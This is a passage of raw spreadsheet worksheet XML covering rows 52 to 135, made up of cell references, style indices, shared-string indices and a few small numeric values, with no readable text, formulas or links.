      <c r="D52" s="47" t="s">
        <v>390</v>
      </c>
      <c r="E52" s="47" t="s">
        <v>391</v>
      </c>
      <c r="F52" s="47" t="s">
        <v>763</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="47"/>
      <c r="B53" s="47" t="s">
        <v>327</v>
      </c>
      <c r="C53" s="47" t="s">
        <v>389</v>
      </c>
      <c r="D53" s="47" t="s">
        <v>392</v>
      </c>
      <c r="E53" s="47" t="s">
        <v>393</v>
      </c>
      <c r="F53" s="77"/>
    </row>
    <row r="54">
      <c r="A54" s="47"/>
      <c r="B54" s="47" t="s">
        <v>327</v>
      </c>
      <c r="C54" s="47" t="s">
        <v>389</v>
      </c>
      <c r="D54" s="47" t="s">
        <v>394</v>
      </c>
      <c r="E54" s="47" t="s">
        <v>395</v>
      </c>
      <c r="F54" s="77"/>
    </row>
    <row r="55">
      <c r="A55" s="47"/>
      <c r="B55" s="47" t="s">
        <v>327</v>
      </c>
      <c r="C55" s="47" t="s">
        <v>396</v>
      </c>
      <c r="D55" s="47" t="s">
        <v>390</v>
      </c>
      <c r="E55" s="47" t="s">
        <v>391</v>
      </c>
      <c r="F55" s="77"/>
    </row>
    <row r="56">
      <c r="A56" s="47"/>
      <c r="B56" s="47" t="s">
        <v>327</v>
      </c>
      <c r="C56" s="47" t="s">
        <v>396</v>
      </c>
      <c r="D56" s="47" t="s">
        <v>392</v>
      </c>
      <c r="E56" s="47" t="s">
        <v>393</v>
      </c>
      <c r="F56" s="77"/>
    </row>
    <row r="57">
      <c r="A57" s="47"/>
      <c r="B57" s="47" t="s">
        <v>327</v>
      </c>
      <c r="C57" s="47" t="s">
        <v>396</v>
      </c>
      <c r="D57" s="47" t="s">
        <v>394</v>
      </c>
      <c r="E57" s="47" t="s">
        <v>395</v>
      </c>
      <c r="F57" s="77"/>
    </row>
    <row r="58">
      <c r="A58" s="3" t="s">
        <v>397</v>
      </c>
      <c r="B58" s="3" t="s">
        <v>327</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>764</v>
      </c>
      <c r="D58" s="3" t="s">
        <v>399</v>
      </c>
      <c r="E58" s="3" t="s">
        <v>400</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>765</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="3"/>
      <c r="B59" s="3" t="s">
        <v>327</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>764</v>
      </c>
      <c r="D59" s="3" t="s">
        <v>401</v>
      </c>
      <c r="E59" s="3" t="s">
        <v>766</v>
      </c>
      <c r="F59" s="74"/>
    </row>
    <row r="60">
      <c r="A60" s="25" t="s">
        <v>407</v>
      </c>
      <c r="B60" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C60" s="25" t="s">
        <v>408</v>
      </c>
      <c r="D60" s="25" t="s">
        <v>409</v>
      </c>
      <c r="E60" s="25" t="s">
        <v>410</v>
      </c>
      <c r="F60" s="25">
        <v>5.0</v>
      </c>
      <c r="G60" s="1">
        <v>3.0</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="25" t="s">
        <v>767</v>
      </c>
      <c r="B61" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C61" s="25" t="s">
        <v>411</v>
      </c>
      <c r="D61" s="25" t="s">
        <v>411</v>
      </c>
      <c r="E61" s="25" t="s">
        <v>412</v>
      </c>
      <c r="F61" s="78"/>
      <c r="G61" s="1" t="s">
        <v>768</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="25"/>
      <c r="B62" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C62" s="25" t="s">
        <v>411</v>
      </c>
      <c r="D62" s="25" t="s">
        <v>392</v>
      </c>
      <c r="E62" s="25" t="s">
        <v>412</v>
      </c>
      <c r="F62" s="78"/>
      <c r="G62" s="1"/>
    </row>
    <row r="63">
      <c r="A63" s="25"/>
      <c r="B63" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C63" s="25" t="s">
        <v>413</v>
      </c>
      <c r="D63" s="25" t="s">
        <v>411</v>
      </c>
      <c r="E63" s="25" t="s">
        <v>414</v>
      </c>
      <c r="F63" s="78"/>
    </row>
    <row r="64">
      <c r="A64" s="25"/>
      <c r="B64" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C64" s="25" t="s">
        <v>415</v>
      </c>
      <c r="D64" s="25" t="s">
        <v>416</v>
      </c>
      <c r="E64" s="48" t="s">
        <v>417</v>
      </c>
      <c r="F64" s="78"/>
    </row>
    <row r="65">
      <c r="A65" s="25"/>
      <c r="B65" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C65" s="25" t="s">
        <v>415</v>
      </c>
      <c r="D65" s="25" t="s">
        <v>392</v>
      </c>
      <c r="E65" s="25" t="s">
        <v>418</v>
      </c>
      <c r="F65" s="78"/>
    </row>
    <row r="66">
      <c r="A66" s="25"/>
      <c r="B66" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C66" s="25" t="s">
        <v>419</v>
      </c>
      <c r="D66" s="25" t="s">
        <v>416</v>
      </c>
      <c r="E66" s="25" t="s">
        <v>420</v>
      </c>
      <c r="F66" s="78"/>
    </row>
    <row r="67">
      <c r="A67" s="25"/>
      <c r="B67" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C67" s="25" t="s">
        <v>421</v>
      </c>
      <c r="D67" s="25" t="s">
        <v>404</v>
      </c>
      <c r="E67" s="48" t="s">
        <v>422</v>
      </c>
      <c r="F67" s="78"/>
      <c r="G67" s="35"/>
    </row>
    <row r="68">
      <c r="A68" s="25"/>
      <c r="B68" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C68" s="25" t="s">
        <v>423</v>
      </c>
      <c r="D68" s="25" t="s">
        <v>424</v>
      </c>
      <c r="E68" s="25" t="s">
        <v>425</v>
      </c>
      <c r="F68" s="78"/>
      <c r="G68" s="35"/>
    </row>
    <row r="69">
      <c r="A69" s="25"/>
      <c r="B69" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C69" s="25" t="s">
        <v>423</v>
      </c>
      <c r="D69" s="25" t="s">
        <v>392</v>
      </c>
      <c r="E69" s="25" t="s">
        <v>426</v>
      </c>
      <c r="F69" s="78"/>
      <c r="G69" s="35"/>
    </row>
    <row r="70">
      <c r="A70" s="25"/>
      <c r="B70" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C70" s="25" t="s">
        <v>427</v>
      </c>
      <c r="D70" s="25" t="s">
        <v>409</v>
      </c>
      <c r="E70" s="25" t="s">
        <v>428</v>
      </c>
      <c r="F70" s="78"/>
      <c r="G70" s="35"/>
    </row>
    <row r="71">
      <c r="A71" s="25"/>
      <c r="B71" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C71" s="25" t="s">
        <v>429</v>
      </c>
      <c r="D71" s="25" t="s">
        <v>409</v>
      </c>
      <c r="E71" s="25" t="s">
        <v>430</v>
      </c>
      <c r="F71" s="78"/>
      <c r="G71" s="35"/>
    </row>
    <row r="72">
      <c r="A72" s="25"/>
      <c r="B72" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C72" s="25" t="s">
        <v>431</v>
      </c>
      <c r="D72" s="25" t="s">
        <v>424</v>
      </c>
      <c r="E72" s="48" t="s">
        <v>425</v>
      </c>
      <c r="F72" s="78"/>
      <c r="G72" s="35"/>
    </row>
    <row r="73">
      <c r="A73" s="25"/>
      <c r="B73" s="25" t="s">
        <v>327</v>
      </c>
      <c r="C73" s="25" t="s">
        <v>431</v>
      </c>
      <c r="D73" s="25" t="s">
        <v>409</v>
      </c>
      <c r="E73" s="25" t="s">
        <v>432</v>
      </c>
      <c r="F73" s="78"/>
      <c r="G73" s="35"/>
    </row>
    <row r="74">
      <c r="A74" s="44" t="s">
        <v>446</v>
      </c>
      <c r="B74" s="44" t="s">
        <v>327</v>
      </c>
      <c r="C74" s="44" t="s">
        <v>452</v>
      </c>
      <c r="D74" s="44" t="s">
        <v>452</v>
      </c>
      <c r="E74" s="44" t="s">
        <v>453</v>
      </c>
      <c r="F74" s="44">
        <v>2.0</v>
      </c>
      <c r="G74" s="1">
        <v>5.0</v>
      </c>
      <c r="H74" s="1">
        <v>7.0</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="44" t="s">
        <v>769</v>
      </c>
      <c r="B75" s="44" t="s">
        <v>327</v>
      </c>
      <c r="C75" s="49" t="s">
        <v>454</v>
      </c>
      <c r="D75" s="44" t="s">
        <v>448</v>
      </c>
      <c r="E75" s="50" t="s">
        <v>455</v>
      </c>
      <c r="F75" s="76"/>
      <c r="G75" s="1" t="s">
        <v>770</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="44"/>
      <c r="B76" s="44" t="s">
        <v>327</v>
      </c>
      <c r="C76" s="49" t="s">
        <v>454</v>
      </c>
      <c r="D76" s="49" t="s">
        <v>454</v>
      </c>
      <c r="E76" s="44" t="s">
        <v>456</v>
      </c>
      <c r="F76" s="76"/>
      <c r="G76" s="1"/>
    </row>
    <row r="77">
      <c r="A77" s="44"/>
      <c r="B77" s="44" t="s">
        <v>327</v>
      </c>
      <c r="C77" s="49" t="s">
        <v>457</v>
      </c>
      <c r="D77" s="44" t="s">
        <v>448</v>
      </c>
      <c r="E77" s="50" t="s">
        <v>458</v>
      </c>
      <c r="F77" s="76"/>
    </row>
    <row r="78">
      <c r="A78" s="44"/>
      <c r="B78" s="44" t="s">
        <v>327</v>
      </c>
      <c r="C78" s="49" t="s">
        <v>459</v>
      </c>
      <c r="D78" s="44" t="s">
        <v>448</v>
      </c>
      <c r="E78" s="50" t="s">
        <v>458</v>
      </c>
      <c r="F78" s="76"/>
    </row>
    <row r="79">
      <c r="A79" s="44"/>
      <c r="B79" s="44" t="s">
        <v>327</v>
      </c>
      <c r="C79" s="44" t="s">
        <v>460</v>
      </c>
      <c r="D79" s="44" t="s">
        <v>448</v>
      </c>
      <c r="E79" s="50" t="s">
        <v>458</v>
      </c>
      <c r="F79" s="76"/>
    </row>
    <row r="80">
      <c r="A80" s="46" t="s">
        <v>474</v>
      </c>
      <c r="B80" s="53"/>
      <c r="C80" s="53" t="s">
        <v>483</v>
      </c>
      <c r="D80" s="46" t="s">
        <v>479</v>
      </c>
      <c r="E80" s="54" t="s">
        <v>484</v>
      </c>
      <c r="F80" s="46">
        <v>3.0</v>
      </c>
      <c r="G80" s="1">
        <v>1.0</v>
      </c>
      <c r="H80" s="1">
        <v>4.0</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="46" t="s">
        <v>769</v>
      </c>
      <c r="B81" s="55"/>
      <c r="C81" s="55" t="s">
        <v>485</v>
      </c>
      <c r="D81" s="46" t="s">
        <v>486</v>
      </c>
      <c r="E81" s="54" t="s">
        <v>487</v>
      </c>
      <c r="F81" s="5"/>
      <c r="G81" s="1" t="s">
        <v>437</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="46"/>
      <c r="B82" s="55"/>
      <c r="C82" s="55" t="s">
        <v>488</v>
      </c>
      <c r="D82" s="55" t="s">
        <v>477</v>
      </c>
      <c r="E82" s="46" t="s">
        <v>489</v>
      </c>
      <c r="F82" s="5"/>
    </row>
    <row r="83">
      <c r="A83" s="46"/>
      <c r="B83" s="46"/>
      <c r="C83" s="46" t="s">
        <v>490</v>
      </c>
      <c r="D83" s="46" t="s">
        <v>479</v>
      </c>
      <c r="E83" s="46" t="s">
        <v>491</v>
      </c>
      <c r="F83" s="5"/>
    </row>
    <row r="84">
      <c r="A84" s="46"/>
      <c r="B84" s="55"/>
      <c r="C84" s="55" t="s">
        <v>479</v>
      </c>
      <c r="D84" s="46" t="s">
        <v>479</v>
      </c>
      <c r="E84" s="46" t="s">
        <v>492</v>
      </c>
      <c r="F84" s="5"/>
    </row>
    <row r="85">
      <c r="A85" s="14" t="s">
        <v>494</v>
      </c>
      <c r="B85" s="57"/>
      <c r="C85" s="57" t="s">
        <v>495</v>
      </c>
      <c r="D85" s="56" t="s">
        <v>495</v>
      </c>
      <c r="E85" s="14" t="s">
        <v>496</v>
      </c>
      <c r="F85" s="14">
        <v>2.0</v>
      </c>
      <c r="G85" s="1">
        <v>0.0</v>
      </c>
      <c r="H85" s="1">
        <v>2.0</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="14" t="s">
        <v>771</v>
      </c>
      <c r="B86" s="57"/>
      <c r="C86" s="57" t="s">
        <v>495</v>
      </c>
      <c r="D86" s="56" t="s">
        <v>497</v>
      </c>
      <c r="E86" s="14" t="s">
        <v>498</v>
      </c>
      <c r="F86" s="14"/>
      <c r="G86" s="1"/>
    </row>
    <row r="87">
      <c r="A87" s="47" t="s">
        <v>499</v>
      </c>
      <c r="B87" s="47" t="s">
        <v>327</v>
      </c>
      <c r="C87" s="47" t="s">
        <v>500</v>
      </c>
      <c r="D87" s="47" t="s">
        <v>501</v>
      </c>
      <c r="E87" s="47" t="s">
        <v>502</v>
      </c>
      <c r="F87" s="47" t="s">
        <v>772</v>
      </c>
      <c r="G87" s="1"/>
    </row>
    <row r="88">
      <c r="A88" s="3" t="s">
        <v>504</v>
      </c>
      <c r="B88" s="7"/>
      <c r="C88" s="7" t="s">
        <v>517</v>
      </c>
      <c r="D88" s="3" t="s">
        <v>506</v>
      </c>
      <c r="E88" s="3" t="s">
        <v>507</v>
      </c>
      <c r="F88" s="3">
        <v>2.0</v>
      </c>
      <c r="G88" s="1">
        <v>8.0</v>
      </c>
      <c r="H88" s="1">
        <v>10.0</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="3" t="s">
        <v>773</v>
      </c>
      <c r="B89" s="3"/>
      <c r="C89" s="3" t="s">
        <v>512</v>
      </c>
      <c r="D89" s="7" t="s">
        <v>392</v>
      </c>
      <c r="E89" s="3" t="s">
        <v>513</v>
      </c>
      <c r="F89" s="74"/>
      <c r="G89" s="35" t="s">
        <v>774</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="3"/>
      <c r="B90" s="3"/>
      <c r="C90" s="3" t="s">
        <v>514</v>
      </c>
      <c r="D90" s="7" t="s">
        <v>392</v>
      </c>
      <c r="E90" s="3" t="s">
        <v>513</v>
      </c>
      <c r="F90" s="74"/>
    </row>
    <row r="91">
      <c r="A91" s="3"/>
      <c r="B91" s="3"/>
      <c r="C91" s="3" t="s">
        <v>515</v>
      </c>
      <c r="D91" s="7" t="s">
        <v>392</v>
      </c>
      <c r="E91" s="3" t="s">
        <v>516</v>
      </c>
      <c r="F91" s="74"/>
    </row>
    <row r="92">
      <c r="A92" s="25" t="s">
        <v>542</v>
      </c>
      <c r="B92" s="25"/>
      <c r="C92" s="25" t="s">
        <v>543</v>
      </c>
      <c r="D92" s="25" t="s">
        <v>544</v>
      </c>
      <c r="E92" s="25" t="s">
        <v>545</v>
      </c>
      <c r="F92" s="25">
        <v>2.0</v>
      </c>
      <c r="G92" s="1">
        <v>2.0</v>
      </c>
      <c r="H92" s="1">
        <v>4.0</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="25" t="s">
        <v>771</v>
      </c>
      <c r="B93" s="25"/>
      <c r="C93" s="25" t="s">
        <v>546</v>
      </c>
      <c r="D93" s="25" t="s">
        <v>547</v>
      </c>
      <c r="E93" s="25" t="s">
        <v>548</v>
      </c>
      <c r="F93" s="78"/>
      <c r="G93" s="1" t="s">
        <v>775</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="44" t="s">
        <v>555</v>
      </c>
      <c r="B94" s="49"/>
      <c r="C94" s="49" t="s">
        <v>556</v>
      </c>
      <c r="D94" s="44" t="s">
        <v>557</v>
      </c>
      <c r="E94" s="44" t="s">
        <v>558</v>
      </c>
      <c r="F94" s="44">
        <v>5.0</v>
      </c>
      <c r="G94" s="1">
        <v>0.0</v>
      </c>
      <c r="H94" s="1">
        <v>5.0</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="44" t="s">
        <v>776</v>
      </c>
      <c r="B95" s="49"/>
      <c r="C95" s="49" t="s">
        <v>556</v>
      </c>
      <c r="D95" s="44" t="s">
        <v>559</v>
      </c>
      <c r="E95" s="44" t="s">
        <v>560</v>
      </c>
      <c r="F95" s="44"/>
      <c r="G95" s="1"/>
    </row>
    <row r="96">
      <c r="A96" s="44"/>
      <c r="B96" s="49"/>
      <c r="C96" s="49" t="s">
        <v>556</v>
      </c>
      <c r="D96" s="44" t="s">
        <v>561</v>
      </c>
      <c r="E96" s="44" t="s">
        <v>560</v>
      </c>
      <c r="F96" s="44"/>
      <c r="G96" s="1"/>
    </row>
    <row r="97">
      <c r="A97" s="44"/>
      <c r="B97" s="49"/>
      <c r="C97" s="49" t="s">
        <v>556</v>
      </c>
      <c r="D97" s="44" t="s">
        <v>562</v>
      </c>
      <c r="E97" s="44" t="s">
        <v>563</v>
      </c>
      <c r="F97" s="44"/>
      <c r="G97" s="1"/>
    </row>
    <row r="98">
      <c r="A98" s="44"/>
      <c r="B98" s="49"/>
      <c r="C98" s="49" t="s">
        <v>556</v>
      </c>
      <c r="D98" s="44" t="s">
        <v>448</v>
      </c>
      <c r="E98" s="44" t="s">
        <v>563</v>
      </c>
      <c r="F98" s="44"/>
      <c r="G98" s="1"/>
    </row>
    <row r="99">
      <c r="A99" s="46" t="s">
        <v>564</v>
      </c>
      <c r="B99" s="46"/>
      <c r="C99" s="46" t="s">
        <v>565</v>
      </c>
      <c r="D99" s="46" t="s">
        <v>566</v>
      </c>
      <c r="E99" s="46" t="s">
        <v>567</v>
      </c>
      <c r="F99" s="46">
        <v>2.0</v>
      </c>
      <c r="G99" s="1">
        <v>0.0</v>
      </c>
      <c r="H99" s="1">
        <v>2.0</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="46" t="s">
        <v>777</v>
      </c>
      <c r="B100" s="46"/>
      <c r="C100" s="46" t="s">
        <v>568</v>
      </c>
      <c r="D100" s="46" t="s">
        <v>566</v>
      </c>
      <c r="E100" s="46" t="s">
        <v>567</v>
      </c>
      <c r="F100" s="5"/>
    </row>
    <row r="101">
      <c r="A101" s="46"/>
      <c r="B101" s="46"/>
      <c r="C101" s="46" t="s">
        <v>569</v>
      </c>
      <c r="D101" s="46" t="s">
        <v>570</v>
      </c>
      <c r="E101" s="46" t="s">
        <v>571</v>
      </c>
      <c r="F101" s="5"/>
    </row>
    <row r="102">
      <c r="A102" s="14" t="s">
        <v>577</v>
      </c>
      <c r="B102" s="14"/>
      <c r="C102" s="14" t="s">
        <v>578</v>
      </c>
      <c r="D102" s="14" t="s">
        <v>579</v>
      </c>
      <c r="E102" s="14" t="s">
        <v>580</v>
      </c>
      <c r="F102" s="14">
        <v>6.0</v>
      </c>
      <c r="G102" s="1">
        <v>1.0</v>
      </c>
      <c r="H102" s="1">
        <v>7.0</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="14" t="s">
        <v>778</v>
      </c>
      <c r="B103" s="14"/>
      <c r="C103" s="14" t="s">
        <v>581</v>
      </c>
      <c r="D103" s="14" t="s">
        <v>404</v>
      </c>
      <c r="E103" s="14" t="s">
        <v>582</v>
      </c>
      <c r="F103" s="15"/>
      <c r="G103" s="1" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="14"/>
      <c r="B104" s="14"/>
      <c r="C104" s="14" t="s">
        <v>583</v>
      </c>
      <c r="D104" s="14" t="s">
        <v>404</v>
      </c>
      <c r="E104" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F104" s="15"/>
    </row>
    <row r="105">
      <c r="A105" s="14"/>
      <c r="B105" s="14"/>
      <c r="C105" s="14" t="s">
        <v>585</v>
      </c>
      <c r="D105" s="14" t="s">
        <v>404</v>
      </c>
      <c r="E105" s="14" t="s">
        <v>586</v>
      </c>
      <c r="F105" s="15"/>
    </row>
    <row r="106">
      <c r="A106" s="14"/>
      <c r="B106" s="14"/>
      <c r="C106" s="14" t="s">
        <v>587</v>
      </c>
      <c r="D106" s="14" t="s">
        <v>404</v>
      </c>
      <c r="E106" s="14" t="s">
        <v>588</v>
      </c>
      <c r="F106" s="15"/>
    </row>
    <row r="107">
      <c r="A107" s="14"/>
      <c r="B107" s="14"/>
      <c r="C107" s="14" t="s">
        <v>573</v>
      </c>
      <c r="D107" s="14" t="s">
        <v>385</v>
      </c>
      <c r="E107" s="14" t="s">
        <v>574</v>
      </c>
      <c r="F107" s="15"/>
      <c r="J107" s="1"/>
    </row>
    <row r="108">
      <c r="A108" s="14"/>
      <c r="B108" s="14"/>
      <c r="C108" s="14" t="s">
        <v>575</v>
      </c>
      <c r="D108" s="14" t="s">
        <v>385</v>
      </c>
      <c r="E108" s="62" t="s">
        <v>576</v>
      </c>
      <c r="F108" s="15"/>
    </row>
    <row r="109">
      <c r="A109" s="14"/>
      <c r="B109" s="14"/>
      <c r="C109" s="14" t="s">
        <v>589</v>
      </c>
      <c r="D109" s="14" t="s">
        <v>590</v>
      </c>
      <c r="E109" s="14" t="s">
        <v>591</v>
      </c>
      <c r="F109" s="15"/>
    </row>
    <row r="110">
      <c r="A110" s="14"/>
      <c r="B110" s="14"/>
      <c r="C110" s="14" t="s">
        <v>594</v>
      </c>
      <c r="D110" s="14" t="s">
        <v>404</v>
      </c>
      <c r="E110" s="14" t="s">
        <v>595</v>
      </c>
      <c r="F110" s="15"/>
    </row>
    <row r="111">
      <c r="A111" s="14"/>
      <c r="B111" s="14"/>
      <c r="C111" s="14" t="s">
        <v>596</v>
      </c>
      <c r="D111" s="14" t="s">
        <v>385</v>
      </c>
      <c r="E111" s="14" t="s">
        <v>597</v>
      </c>
      <c r="F111" s="15"/>
    </row>
    <row r="112">
      <c r="A112" s="14"/>
      <c r="B112" s="14"/>
      <c r="C112" s="14" t="s">
        <v>596</v>
      </c>
      <c r="D112" s="14" t="s">
        <v>598</v>
      </c>
      <c r="E112" s="14" t="s">
        <v>597</v>
      </c>
      <c r="F112" s="15"/>
    </row>
    <row r="113">
      <c r="A113" s="14"/>
      <c r="B113" s="14"/>
      <c r="C113" s="14" t="s">
        <v>599</v>
      </c>
      <c r="D113" s="14" t="s">
        <v>448</v>
      </c>
      <c r="E113" s="14" t="s">
        <v>600</v>
      </c>
      <c r="F113" s="15"/>
    </row>
    <row r="114">
      <c r="A114" s="3" t="s">
        <v>601</v>
      </c>
      <c r="B114" s="3"/>
      <c r="C114" s="3" t="s">
        <v>602</v>
      </c>
      <c r="D114" s="3" t="s">
        <v>561</v>
      </c>
      <c r="E114" s="3" t="s">
        <v>603</v>
      </c>
      <c r="F114" s="3">
        <v>2.0</v>
      </c>
      <c r="G114" s="1">
        <v>0.0</v>
      </c>
      <c r="H114" s="1">
        <v>2.0</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="3" t="s">
        <v>776</v>
      </c>
      <c r="B115" s="3"/>
      <c r="C115" s="3" t="s">
        <v>602</v>
      </c>
      <c r="D115" s="3" t="s">
        <v>399</v>
      </c>
      <c r="E115" s="3" t="s">
        <v>604</v>
      </c>
      <c r="F115" s="3"/>
      <c r="G115" s="1"/>
    </row>
    <row r="116">
      <c r="A116" s="42" t="s">
        <v>779</v>
      </c>
      <c r="B116" s="42"/>
      <c r="C116" s="42" t="s">
        <v>607</v>
      </c>
      <c r="D116" s="42" t="s">
        <v>404</v>
      </c>
      <c r="E116" s="42" t="s">
        <v>608</v>
      </c>
      <c r="F116" s="42">
        <v>1.0</v>
      </c>
      <c r="G116" s="1">
        <v>2.0</v>
      </c>
      <c r="H116" s="1">
        <v>3.0</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="42" t="s">
        <v>771</v>
      </c>
      <c r="B117" s="42"/>
      <c r="C117" s="42" t="s">
        <v>622</v>
      </c>
      <c r="D117" s="42" t="s">
        <v>404</v>
      </c>
      <c r="E117" s="42" t="s">
        <v>623</v>
      </c>
      <c r="F117" s="75"/>
      <c r="G117" s="35" t="s">
        <v>780</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="44" t="s">
        <v>629</v>
      </c>
      <c r="B118" s="44"/>
      <c r="C118" s="44" t="s">
        <v>611</v>
      </c>
      <c r="D118" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E118" s="44" t="s">
        <v>612</v>
      </c>
      <c r="F118" s="44">
        <v>2.0</v>
      </c>
      <c r="G118" s="1">
        <v>3.0</v>
      </c>
      <c r="H118" s="1">
        <v>5.0</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="44" t="s">
        <v>781</v>
      </c>
      <c r="B119" s="44"/>
      <c r="C119" s="44" t="s">
        <v>613</v>
      </c>
      <c r="D119" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E119" s="44" t="s">
        <v>612</v>
      </c>
      <c r="F119" s="76"/>
      <c r="G119" s="1" t="s">
        <v>782</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="76"/>
      <c r="B120" s="44"/>
      <c r="C120" s="44" t="s">
        <v>614</v>
      </c>
      <c r="D120" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E120" s="44" t="s">
        <v>615</v>
      </c>
      <c r="F120" s="76"/>
    </row>
    <row r="121">
      <c r="A121" s="76"/>
      <c r="B121" s="44"/>
      <c r="C121" s="44" t="s">
        <v>616</v>
      </c>
      <c r="D121" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E121" s="44" t="s">
        <v>615</v>
      </c>
      <c r="F121" s="76"/>
    </row>
    <row r="122">
      <c r="A122" s="76"/>
      <c r="B122" s="44"/>
      <c r="C122" s="44" t="s">
        <v>617</v>
      </c>
      <c r="D122" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E122" s="44" t="s">
        <v>618</v>
      </c>
      <c r="F122" s="76"/>
    </row>
    <row r="123">
      <c r="A123" s="76"/>
      <c r="B123" s="44"/>
      <c r="C123" s="44" t="s">
        <v>619</v>
      </c>
      <c r="D123" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E123" s="44" t="s">
        <v>618</v>
      </c>
      <c r="F123" s="76"/>
    </row>
    <row r="124">
      <c r="A124" s="76"/>
      <c r="B124" s="44"/>
      <c r="C124" s="44" t="s">
        <v>630</v>
      </c>
      <c r="D124" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E124" s="44" t="s">
        <v>631</v>
      </c>
      <c r="F124" s="76"/>
    </row>
    <row r="125">
      <c r="A125" s="76"/>
      <c r="B125" s="44"/>
      <c r="C125" s="44" t="s">
        <v>632</v>
      </c>
      <c r="D125" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E125" s="44" t="s">
        <v>631</v>
      </c>
      <c r="F125" s="76"/>
    </row>
    <row r="126">
      <c r="A126" s="76"/>
      <c r="B126" s="44"/>
      <c r="C126" s="44" t="s">
        <v>633</v>
      </c>
      <c r="D126" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E126" s="44" t="s">
        <v>631</v>
      </c>
      <c r="F126" s="76"/>
    </row>
    <row r="127">
      <c r="A127" s="76"/>
      <c r="B127" s="44"/>
      <c r="C127" s="44" t="s">
        <v>627</v>
      </c>
      <c r="D127" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E127" s="44" t="s">
        <v>623</v>
      </c>
      <c r="F127" s="76"/>
    </row>
    <row r="128">
      <c r="A128" s="76"/>
      <c r="B128" s="44"/>
      <c r="C128" s="44" t="s">
        <v>634</v>
      </c>
      <c r="D128" s="44" t="s">
        <v>635</v>
      </c>
      <c r="E128" s="44" t="s">
        <v>636</v>
      </c>
      <c r="F128" s="76"/>
    </row>
    <row r="129">
      <c r="A129" s="76"/>
      <c r="B129" s="44"/>
      <c r="C129" s="44" t="s">
        <v>634</v>
      </c>
      <c r="D129" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E129" s="44" t="s">
        <v>637</v>
      </c>
      <c r="F129" s="76"/>
    </row>
    <row r="130">
      <c r="A130" s="76"/>
      <c r="B130" s="44"/>
      <c r="C130" s="44" t="s">
        <v>638</v>
      </c>
      <c r="D130" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E130" s="44" t="s">
        <v>639</v>
      </c>
      <c r="F130" s="76"/>
    </row>
    <row r="131">
      <c r="A131" s="76"/>
      <c r="B131" s="44"/>
      <c r="C131" s="44" t="s">
        <v>625</v>
      </c>
      <c r="D131" s="44" t="s">
        <v>370</v>
      </c>
      <c r="E131" s="44" t="s">
        <v>626</v>
      </c>
      <c r="F131" s="76"/>
    </row>
    <row r="132">
      <c r="A132" s="46" t="s">
        <v>644</v>
      </c>
      <c r="B132" s="46"/>
      <c r="C132" s="46" t="s">
        <v>648</v>
      </c>
      <c r="D132" s="46" t="s">
        <v>646</v>
      </c>
      <c r="E132" s="46" t="s">
        <v>647</v>
      </c>
      <c r="F132" s="46">
        <v>8.0</v>
      </c>
      <c r="G132" s="1">
        <v>1.0</v>
      </c>
      <c r="H132" s="1">
        <v>9.0</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="46" t="s">
        <v>783</v>
      </c>
      <c r="B133" s="46"/>
      <c r="C133" s="46" t="s">
        <v>648</v>
      </c>
      <c r="D133" s="46" t="s">
        <v>648</v>
      </c>
      <c r="E133" s="46" t="s">
        <v>649</v>
      </c>
      <c r="F133" s="46"/>
      <c r="G133" s="1"/>
    </row>
    <row r="134">
      <c r="A134" s="5"/>
      <c r="B134" s="46"/>
      <c r="C134" s="46" t="s">
        <v>650</v>
      </c>
      <c r="D134" s="46" t="s">
        <v>392</v>
      </c>
      <c r="E134" s="46" t="s">
        <v>651</v>
      </c>
      <c r="F134" s="5"/>
      <c r="G134" s="1" t="s">
        <v>657</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5"/>
      <c r="B135" s="46"/>
      <c r="C135" s="46" t="s">
        <v>652</v>
      </c>
      <c r="D135" s="46" t="s">
        <v>652</v>
      </c>
      <c r="E135" s="46" t="s">
        <v>653</v>
      </c>
